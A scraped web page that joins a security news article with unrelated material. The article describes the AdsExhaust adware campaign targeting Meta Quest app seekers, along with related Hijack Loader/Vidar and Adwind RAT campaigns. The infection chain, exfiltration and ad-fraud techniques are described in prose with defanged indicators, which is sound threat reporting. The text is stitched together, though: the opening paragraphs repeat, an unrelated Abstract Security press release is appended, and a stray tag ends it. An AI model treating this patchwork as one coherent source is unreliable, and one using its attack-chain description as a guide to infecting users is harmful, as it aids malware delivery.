A new campaign is tricking users searching for the Meta Quest (formerly Oculus) application for Windows into downloading a new adware family called AdsExhaust.
"The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes," cybersecurity firm eSentire said in an analysis, adding it identified the activity earlier this month.
"

A new campaign is tricking users searching for the Meta Quest (formerly Oculus) application for Windows into downloading a new adware family called AdsExhaust.

"The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes," cybersecurity firm eSentire said in an analysis, adding it identified the activity earlier this month.

"These functionalities allow it to automatically click through advertisements or redirect the browser to specific URLs, generating revenue for the adware operators."

The initial infection chain involves surfacing the bogus website ("oculus-app\[.\]com") on Google search results pages using search engine optimization (SEO) poisoning techniques, prompting unsuspecting site visitors to download a ZIP archive ("oculus-app.EXE.zip") containing a Windows batch script.

The batch script is designed to fetch a second batch script from a command-and-control (C2) server, which, in turn, contains a command to retrieve another batch file. It also creates scheduled tasks on the machine to run the batch scripts at different times.

This step is followed by the download of the legitimate app onto the compromised host, while simultaneously additional Visual Basic Script (VBS) files and PowerShell scripts are dropped to gather IP and system information, capture screenshots, and exfiltrate the data to a remote server ("us11\[.\]org/in.php").

The response from the server is the PowerShell-based AdsExhaust adware that checks if Microsoft's Edge browser is running and determines the last time a user input occurred.

"If Edge is running and the system is idle and exceeds 9 minutes, the script can inject clicks, open new tabs, and navigate to URLs embedded in the script," eSentire said. "It then randomly scrolls up and down the opened page."

It's suspected that this behavior is intended to trigger elements such as ads on the web page, especially considering AdsExhaust performs random clicks within specific coordinates on the screen.

The adware is also capable of closing the opened browser if mouse movement or user interaction is detected, creating an overlay to conceal its activities to the victim, and searching for the word "Sponsored" in the currently opened Edge browser tab in order to click on the ad with the goal of inflating ad revenue.

Furthermore, it's equipped to fetch a list of keywords from a remote server and perform Google searches for those keywords by launching Edge browser sessions via the Start-Process PowerShell command.

"AdsExhaust is an adware threat that cleverly manipulates user interactions and hides its activities to generate unauthorized revenue," the Canadian company noted.

"It contains multiple techniques, such as retrieving malicious code from the C2 server, simulating keystrokes, capturing screenshots, and creating overlays to remain undetected while engaging in harmful activities."

The development comes as similar fake IT support websites surfaced via search results are being used to deliver Hijack Loader (aka IDAT Loader), which ultimately leads to a Vidar Stealer infection.

What makes the attack stand out is that the threat actors are also leveraging YouTube videos to advertise the phony site and using bots to post fraudulent comments, giving it a veneer of legitimacy to users looking for solutions to address a Windows update error (error code 0x80070643).

"This highlights the effectiveness of social engineering tactics and the need for users to be cautious about the authenticity of the solutions they find online," eSentire said.

The disclosure also comes on the heels of a malpsam campaign targeting users in Italy with invoice-themed ZIP archive lures to deliver a Java-based remote access trojan named Adwind (aka AlienSpy, Frutas, jRAT, JSocket, Sockrat, and Unrecom).

"Upon extraction the user is served with .HTML files such as INVOICE.html or DOCUMENT.html that lead to malicious .jar files," Broadcom-owned Symantec said.

"The final dropped payload is Adwind remote access trojan (RAT) that allows the attackers control over the compromised endpoint as well as confidential data collection and exfiltration."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Warning: New Adware Campaign Targets Meta Quest App Seekers

PRESS RELEASE

SAN FRANCISCO, June 20, 2024 /PRNewswire/ -- Abstract Security, crafted by category creators who have consistently redefined the cybersecurity landscape, today announced general availability (GA) of its revolutionary platform designed for the future of security operations. Already in use by customers, Abstract's platform helps security analysts and operations teams navigate the complexities of data pipelines, increase security effectiveness and lower costs.

"Since the inception of Abstract, we've been working tirelessly to combat the challenges of security operations today, offering a tool that focuses on the data that matters and ties security back to business value," said Ryan Clough, co-founder and CPO of Abstract Security. "With the explosion of data over the last few years, customers need a more customizable approach that moves beyond saved searches and dashboards. We're excited to reach this GA milestone as we bring the future security operations platform to more customers."

A key feature of Abstract's platform is the Abstract Security Engineer (ASE), which leverages a combination of AI, expert systems, machine learning, and subject matter expertise and connects to data sources across an organization, delivering instant data and detection capabilities. The security data fabric approach enables:

*   Advanced analytics and correlation: Abstract's platform enables customers to surface threats across their enterprise and cloud infrastructure in real-time. It's powered by out-of-the-box detection content provided by the Abstract research team, which is purpose-built for cloud and SaaS threats.
    
*   Security pipelines: With data routing, transformation and enrichment that is geared for security telemetry, customers can reduce the volume and cost of log data sent to their SIEM. A single point of collection enables drag-and-drop routing of data to any number of sources, including cloud storage, SIEMs, and data platforms.
    
*   Optimized storage: 95% of collected log data is not usable for detection. Abstract's platform intelligently divides hot, warm, and cold storage tiers to automatically optimize storage and compute costs and make the data relevant to security analytics accessible via instant queries.
    

Since emerging from stealth and announcing its Seed funding earlier this year, Abstract Security has expanded its global footprint, hired an experienced technology leader as CTO, and appointed a long-time industry expert to its Board of Directors. To aid in the continued development of the Abstract Security platform, the team has added visionary and innovator Jon Oltsik to its Advisory Board. With over 35 years of technology industry experience, Jon founded the cybersecurity practice at the Enterprise Strategy Group (ESG) in 2003 and has spent the subsequent 20 years studying cyber threats, cyber-risk management, technical defenses, and CISO strategies. Jon is widely recognized as an expert in all aspects of cybersecurity and is often called upon to help customers understand a CISO's perspective. Jon is a founding member of the Cybersecurity Canon, a project dedicated to identifying a list of must-read books for all cybersecurity practitioners, and he was named one of the top 100 cybersecurity influencers by Onalytica.

"Defending against cyber-attacks is more difficult today than it's ever been. With the complexity of infrastructure and sheer volume of data that organizations must manage, today's security analytics teams are tired of the status quo," said Jon Oltsik, Advisory Board member of Abstract Security. "Working as an analyst and advisor has given me a unique perspective into the pain points of industry leaders, and that's why I'm so excited about the unique approach that Abstract Security is taking to solve the problems in the SIEM marketplace, and have the opportunity to support and guide the team as they grow."

In the past several months, Abstract has also been recognized by notable industry awards including a Global Infosec Award for "Pioneering Cybersecurity Startup" at RSA Conference 2024, and most recently, a 2024 Cybersecurity Excellence Award in both "Best Cybersecurity Startup" and "SIEM" categories. The team's commitment to crafting an excellent platform for customers, keeping their sights on innovation, and thoughtful leadership won Abstract the award in both categories, beating out more than 600 applicants.

To learn more about Abstract Security's growing team and accomplishments, visit https://www.abstract.security/our-team or watch this Q&A with Jon Oltsik and CEO Colby DeRodeff. To book a demo, please contact \[email protected\].

About Abstract Security  
Abstract Security, founded in 2023, has built a revolutionary platform equipped with an AI-powered assistant to better centralize the management of security analytics. Crafted by category creators and industry veterans known for redefining the cybersecurity landscape, Abstract transcends next-gen SIEM solutions by correlating data in real time between data streams. As a result, compliance and security data can be leveraged separately to increase detection effectiveness and lower costs – an approach that does not currently exist in the market.

Co-founders Colby DeRodeff, Ryan Clough, Aaron Shelmire, and Chris Camacho bring a unique set of experiences and backgrounds in product development and company-building expertise, formerly at companies like ArcSight (acq. by HP), Mandiant (acq. by Google), Palo Alto Networks and others. For more information about the company, please visit https://www.abstract.security/ and follow the journey @Get\_Abstracted.

Tag

#mac